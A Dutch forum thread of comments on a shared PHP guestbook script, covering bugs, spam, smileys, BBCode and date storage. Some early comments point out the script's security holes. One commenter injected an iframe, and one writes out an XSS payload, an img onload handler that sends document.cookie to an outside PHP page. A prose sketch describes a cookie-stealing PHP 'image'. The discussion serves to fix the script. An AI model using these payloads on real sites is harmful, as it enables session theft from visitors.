Gevorderd gastenboek

Leuk script :)
Vind je eht goed als ik het bij mij op de site in de bibliotheek neerzet?

Je controleert het naam-veld niet op html :)

Ik zag toch echt ergens htmlspecialchars() staan hoor..

'k Weet alleen niet of het uitmaakt.

UBB-hacks zijn mogelijk, als ik bijvoorbeeld een eeuwige lus inbouw, dan ben je mooi de klos...

Naja, ik heb alleen nog maar het voorbeeld gecontroleerd. Daar kan je onder andere javascript in links oproepen, wat onveilig is voor bezoekers (document.cookies) en naja, zie het voorbeeld maar, ik heb een iframe in mijn naam gezet.

E-mailadres wordt ook niet gecontroleerd. Probeer deze functie er is in te verwerken:



Of in ieder gavel een functie die kijkt of er voldaan wordt aan een string die op een e-mailadres lijkt (punten en de @).

Edit:
Die iframe ziet er erg grappig uit... :)

Elwin

zou je het formulie niet gewoon in HTML doen. Dat je de PHP even afsluit?

Ik zie nu hoe een kwaadwillende geest zo'n gastenboek zou kunnen vernielen, heeft iemand een idee hoe ik zorg dat ik javascript en html blok?

edit:
en dan staat er ook nog HTML OFF :P foutje

html in je naam is nu onmogelijk en in het emailveld ook, wat ik nog niet helemaal begrijp is dat htmlspecialchars() genoeg is om html te blokkeren? is dat zo, of hebben jullie nog meer manieren om gevaarlijke dingen erin te krijgen?

bedankt iig:)

*

'&' (ampersand) wordt '&'
*

'"' (dubbele quote) wordt '"' wanneer ENT_NOQUOTES niet geactiveerd is.
*

''' (enkele quote) wordt ''' alleen wanneer ENT_QUOTES geactiveerd is.
*

'<' (kleiner dan) wordt '&lt;'
*

'>' (groter dan) wordt '&gt;'

**rip van php.net**

dus html en js gaat niet lukken..
ik heb je script niet echt doorgelezen nog.. maar een paar dingen die soms over het hoofd gezien worden zijn:
als ik een plaatje neer kan zetten, dan kan ik een php script maken, wat je cookies steelt.. (htacces gewoon jpg als php laten parsen, dan eerst een cookie stealer, en dan een plaatje terugsture.. simpel als dat!)
op deze manier is het ook mogelijk onschuldigen te laten mass-posten..
gewoon hetzelfde script als net die cookie stealer een lusje geven, hem data laten posten, klaar!

huib

@huib

ik snap je even niet helemaal:S leg eens uit hoe je via een plaatje php kan uitvoeren?

edit:
formulier is nu onder de php gezet.

email word nu gevalideerd, bbcode.php is nu functies.php en reactie.php is ook veranderd.

nu nog javascript blokkeren in tags, enig idee?
voor de rest denk ik dat ik een redelijk script heb gemaakt, wat jullie?

Chris

Kan je vervangen door:

$result = mysql_query("SELECT COUNT(`id`) FROM gastenboek");
$aantal = mysql_result($result, 0);

De rijen ophalen is zinloos, je gebruikt ze nadien niet meer, dus een count() is sneller én beter :)

:: gedaan:)

Haal dan wel die belachelijke backticks (`````) eruit, dat is een stom grapje van MySQL en wijkt af van de SQL-standaard :)

Heel simpel, je roept het aan door <img src="bestand.php" alt="niks" /> en dan zet je daar je expressies in...

Even voor de duidelijkheid: Cookies worden alleen naar adressen gestuurd die op het zelfde domein liggen. Dus ik kan niet hier zomaar een plaatje dumpen en al jullie koekjes proeven. Het kan wel waneer je bijvoorbeeld <img src="" onload="this.src='mijnsite/bestand.php?cookie='+document.cookie"/>, dus javascript kan toepassen. Maar dat kon al niet op jouw site, hij blokkeert " in de url.

Dan kan je toch gewoon ' gebruiken?

Binnen "" heeft ' geen betekenis. <img src="plaatje.php' onload='this.src=\'iets.php\'+document.cookie"/> laat gewoon het plaatje met de url plaatje.php' onload='this.src=\'iets.php\'+document.cookie, maar dan urlencoded().

Hallo

hoe ziet je tabel in je database eruit. Ik zie dat hier niet staan.

staat nu bovenaan op deze pagina;)

ja bedankt

maar bij mij lukt de ubb code niet als ik een smilie invoeg en dan kijk ik naar de berichten staat daar zo iet raars.

dit komt bij men bericht:

test op 26-02-2006 om 13
:o:k<de="0" sc=">ss<r <<">i>b>> < <b>> test< <b>> :ode="0" src="">

http://kljzaffelare.funpic.de/home.php?menu=gastenboek1

het ziet er heel goed uit,

maar ik zou het nou niet echt een simpel gastenboek noemen:
afbreken op elke x reacties
ubb(de codes van PHPHulp?)
smiles
en prima beschermd tegen mysql_injection met is_numeric over de $_GET en al het gezeik rondom de invoer

Ik krijg die bbcode echt niet werkend als ik het toevoeg dan krijg ik altijd rare dingen in men bericht.

en er staat een fout in je bbcodes.html

schokend moet schokkend zijn denk ik

@Gijs
het begon simpel, ik zal het even hernoemen.

@Pieter
bbcodes.html zal het niet aan liggen, mail me anders even (pm lees ik minder vaak) en dan fixen we het even.

whoot!! :shock wat gebeurt hier nou. word mijn html nou geparsed en mn css ook, he dit klopt niet, roep basje!!!

ow nu is het weer normaal, hoe dat nou kwam weet ik niet.

Chris, de onderdelen die je aangepast hebt staan die hierboven al in je script verwerkt?

Hij werkt wel goed, alleen vind ik het een beetje irri dat je bericht op de laatste pagina terecht komt in plaats van op de eerste.

Bassos, DESC veranderen in ASC.

Handig script!!
bedankt! Chris!

uhmm... nogal n00b vraag van mij:
hoe installeer ik zo'n script.?
:D

Geweldig bedankt ik heb hem bij een vriendin opgezet en ga hem nu Duits competable maken :)
SITE

OK bij mij werkt de UBB code niet :(((
Iemand enig idee waarom niet?

Ik had ook dit probleem. Ik heb dan maar een andere UBB parser gebruikt en nu werkt het perfect.

dit is functies.php

Ik heb het gevonden en alles werkt nu zelf am Deutsch :)

Dank je Pieter en ik heb alles werken :)))))

Graag gedaan Lissy

Wat er fout zit in Chris zijn UBB parser weet ik niet. Maarja nu werkt het toch met een andere UBB parser.

Dat is goed he:d

waar kan je de plaatjes downloaden?????

zet het ff d'r op.

Wil je a.u.b. een download bestand aanmaken wand ik heb geen zin in dat gekoopieër!!!!?

Je kan op klikken, bovenaan het code blok.

HELP!!!

Er wordt allemaal spam in allegastenboeken van dit script geplaatst!!!!
Weet iemand hier wat tegen!!!???

zet er een session in of sleep(15);

oke??
(ik ben nog een n00b)
wat voor een?

gebruik anders gewoon sleep(5);

dan moeten ze weer 5 seconden wachten voordat ze kunnen posten

oke ga ik proberen

bericht.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bericht</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<script src="scripts.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>

</body>
</html>

Nog iemand aanwezig?? Ik merk bij dit gastenboek dat de berichten niet goed worden gesorteerd op datum. Want hij kijkt alleen maar naar de dag en niet naar de maand. Heeft iemand een oplossing hiervoor?

Ik heb alles nu gestorteerd op ID nummer dan staan ze wel goed

Mooi script,

Check my site http://hellguards.phpnet.us/gb-db/gastenboek.php voor een voorbeeld

De smileys werken helemaal niet. Als ik klik op een smiley gebeurt er helemaal niks, als ik de juiste combinatie intyp (bijvoorbeeld :) ) Dan komt er te staan in het bericht als ik heb ingevooer: Emoticon
Waar ligt dit aan?

De smileys werken helemaal niet. Als ik klik op een smiley gebeurt er helemaal niks, als ik de juiste combinatie intyp (bijvoorbeeld :) ) Dan komt er te staan in het bericht als ik heb ingevooer: Emoticon
Waar ligt dit aan?

je hebt geen plaatjes in de map waar de plaatjes moeten staan geplaatst. Wanneer je iets hebt ingevoerd en hij vind het plaatje niet zal hij dus de alternatieve tekst weergeven Emoticon. Grote kans dat wanneer je plaatjes bij elkaar zoekt en deze de juiste bestandsnaam geeft je smiley's wel werken!

Succes!

Ok bedankt. Ik ben erachter, de smiles moeten in 2 mappen staan. Ze doen het nu wel. Maar alleen als je de 'code' invoert. Het werkt nog niet als je op de smile klikt, dat ze dan in de tekst komen te staan. Enig idee hoe dat komt?
http://brefriends.nl/gastenboek.php

FireFox zegt: sendtext is not defined

Kijk is naar het script wat in Arjan's nieuwsysteem zit, en ik mijn mailinglist. Daarmee moet het lukken

Dit script gaat problemen opleveren wanneer je iets met datums wilt gaan doen:

Dit heeft natuurlijk niets met een datum te maken wanneer je dit zo in de database gaat wegschrijven. Ga bv. maar eens sorteren op datum, dit zal de meest bijzondere resultaten opleveren.

Een datum sla je op in een DATE en NOOIT, maar dan ook helemaal NOOIT in een VARCHAR. En omdat DATE het iso-formaat gebruikt, moet je dus yyyy-mm-dd als formaat hanteren. Maar omdat rekenen met datums zo'n beetje standaard database-werk is, hebben ze daar de functie NOW() voor in het leven geroepen, zie de handleiding van MySQL (hoofdstuk 12.5).

Ik heb nu ook last van spam in dit gastenboek. Om de 7 minuten wordt er een laptekst ingezet met allemaal links er in (zonder de BB code dan). Dat kun je toch niet verhelpen met een sleep erin. Iemand nog tips of een oplossing hiervoor. Het is trouwens elke keer een andere naam en e-mail

Mooi script, maar volgens mij toch een paar kleine onvolkomenheden.
1. BB-codes werken bij mij niet (mijn fout?). In de posts zie ik dat er een alternatieve functies.php moet worden gebruikt. Tip aan Chris: pas dit zo aan in de oorspronkelijke functies.php, dat is voor volgende gebruikers makkelijker.
2. Frank schrijft dat voor de datum een type DATE moet worden gebruikt. Volgens mij is dat correct, maar hoe doe je de conversie dan? (BTW bij het ophalen van de berichten wordt er nu gesorteerd op datum, maar nu is de datum opgeslagen in een tekstveld, wat dan tot rare resultaten leidt: 16-10-2006 staat boven 2-11-2006 staat boven 1-8-2005...). Volgens mij leidt dit namelijk wel tot wat wijzigingen links en rechts: het tijdstip moet ook worden opgeslagen (is dit een extra veld in de database?) en bij het ophalen van de data moet dan een vertaalslag worden gemaakt om te komen tot 'dd-mm-yyyy om hh:mm:ss'. Kan iemand een php-newbee hiermee op weg helpen?

Voor de rest nogmaals de complimenten voor het mooie script, mijn bovenstaande puntjes zijn voor mij slechts de puntje op de i.

Kan ik hier makkelijk een captcha inmaken? Heb veel last van spam.
Heb al ip geblokt, maar helpt geen kloten.
Hoe doe ik dat met de captcha? Weet iemand een makkelijk voorbeeld, ik ben niet erg goed met php.

ik heb een vraagje, ik heb het script nu werkend gekregen. Het bevalt me wel. Ik heb alleen 2 vraagjes.

1. Het schermpje van de BBcodes komt niet

2. als ik op m'n smilies klik, komen ze niet in de tekst te staan

hoe verhelp ik dit? alvast bedankt

1. zorg dat de link de juiste is naar de pagina van de bbcodes.
2. ik heb hetzelfde probleem, maar de juiste bbcode invoeren werkt wel

waar zijn die smilys ? :s

Bedankt voor dit gastenboek! Ik heb hem op mijn site gezet en zelf aangepast qua layout, en hij werkt prima!

Er is echter één prbleempje: Zodra iemand een bericht in het gastenboek zet waar een 't (apostroph+t) in voorkomt, geeft het gastenboek een foutmelding. Omdat mijn website in een Nederlands dialect is waar " 't " vaak wordt gebruikt, is het voor mijn gastenboek belangrijk dat de gasten het kunnen gebruiken. Hoe regel ik dat?

Ik ben er al achter dat de code voor een apostroph &apos; is en heb geprobeerd het toe te voegen aan functies.php (waar ik denk dat het hoort), maar dat liep niet helemaal goed af.
Zou een meer ervaren php-er mij kunnen helpen?
Alvast hartelijk dank!


O ja en dan nog iets: Een admin zou een mooie aanvulling zijn op dit gastenboek. Is het mogelijk om dit op een eenvoudig manier te maken?

mensen, zorg dat je die javascript goed geinclude hebt hé...
dan moet hij gewoon zeker werken.. dus:

<script src="scripts.js" type="text/javascript"></script>

verder vind ik het echt een moooi gastenboek, werkt mooi bij mij, zonder problemen, voor een voorbeeld kijk maar eens hier:
http://weaselweb.nl/gb/bericht.php

verder heb ik er niets op aan te merken... mooi script en werkt goed bij mij..

En jelle, smilies moet je zelf voor zorgen ;)

misschien omdat dit gastenboek zijn datum opslaat in varchar, wat eigenlijk gewoon niet goed is, gebruik hier datetime voor, werkt veel beter ;) Het is geen probleem om dat aan te passen hoor :P en dan werk dat wel!

Open je PHP in functies.php anders even met

@bastiaan, dat ligt eraan of je server shottags ondersteund

Je kunt beter bij een foutmelding (bijv, geen bericht ingevoerd) de volgende link gebruiken
Klik <a href="javascript:history.go(-1)">hier</a>
ipv
Klik <a href=\"gastenboek.php\">hier</a>
Zo blijft hetgene wat je in hebt gevuld staan in het formulier. Kleine kanttekening maar.

Waar kan ik de bbcode images downloaden? Het ziet er zonder images zo kaal uit...

Hoe doe je dat met datetime in plaats van varchar? Gewoon datetime neerzetten overal waar nu varchar staat? Want ook bij mij stan de berichtjes door elkaar, en ik heb er niet zelf berichten aan toegevoegd...

Ik zou het leuk vinden als ik dat kon fixen maar helaas heb ik te weinig verstand van php. Al is het me wel gelukt om smileys toe te voegen aan mijn gastenboek.

Iemand nog een oplossing voor mijn " 't "probleem?Elke keer als iemand " 't " schrijft, wordt het bericht niet geaccepteerd. Moet ik iets toevoegen aan de code om dat te voorkomen? En zo ja: hoe en wat?

Groetjes Resie

Hallo, ik ben hier net nieuw en heb al een vraagje ;-)

ik heb deze code aan een vriend gegeven (ook zelf gebruik ik hem) maar bij hem staan er al meer dan 10 berichten in zijn database, maar als hij dan bovenaan naar pagina 2 wilt gaan vind de server die pagina niet :s wat kan ik daartegen doen?

EDIT: heb de fout al gevonden :) had een misse link gezet naar de paginas :) wel tof scriptje.. alleen zou ik wel de smiles erbij zetten.. (heb ze nu wel zelf gezocht)

Toppie gastenboek,
maar waar haal ik de smilies vandaan of moet je die zlef maken?
greetzz, milo

jah idd.. hoe kom je aan die smiles?

Zijn die er niet bij dan ?
En online voorbeeld is ook handig.

Goed gastenboek, het enigste wat jammer is dat er geen klein adminpannel o.i.d. bij zit, echter ga ik me binnenkort een beetje verdiepen in PHP en ga ik dit proberen te realiseren voor mezelf.

Nu heb ik 1 vraagje, zie http://perkele.nl/drc/gastenboek.php .. als je een smily aanklikt verschijnt deze niet in het textveld, doe ik iets fout?

Ik heb alle bestanden behalve gastenboek.php verplaatst naar /functies/ folder op mijn server, ik heb in alle pagina's een correct verwijzing gemaakt naar de correcte mappings ... doe ik dan toch iets verkeerd? Zoja, kunnen jullie me vertellen wat?

Alvast bedankt voor de moeite ..

Groetjes,

Patrick

patrick schreef: als je een smily aanklikt verschijnt deze niet in het textveld

dat probleem heb ik dus ook.... hoe kan dat? de BBcode werkt wel als ik bijvoorbeeld gewoon :D invoer in het tekstveld. Maar het werkt niet om op de afbeeldingen te klikken en dán de smiley te zien krijgen in het geplaatste bericht. (verder een uitstekend script!)

ow gevonden!

de verwijzing naar het .js bestand werkt op de een of andere manier niet goed. Als je de volgende code boven het 'addbericht'-form invoert (tussen de html-code), dan werkt het gewoon:

<script>
function sendtext(e, text) {
e.value += text
}
</script>

hoe krijg je die foto's nou eigenlijk zo netjes onder elkaar? :P
ik heb ze allemaal naast elkaar :(

Je kunt beter even een topic openen.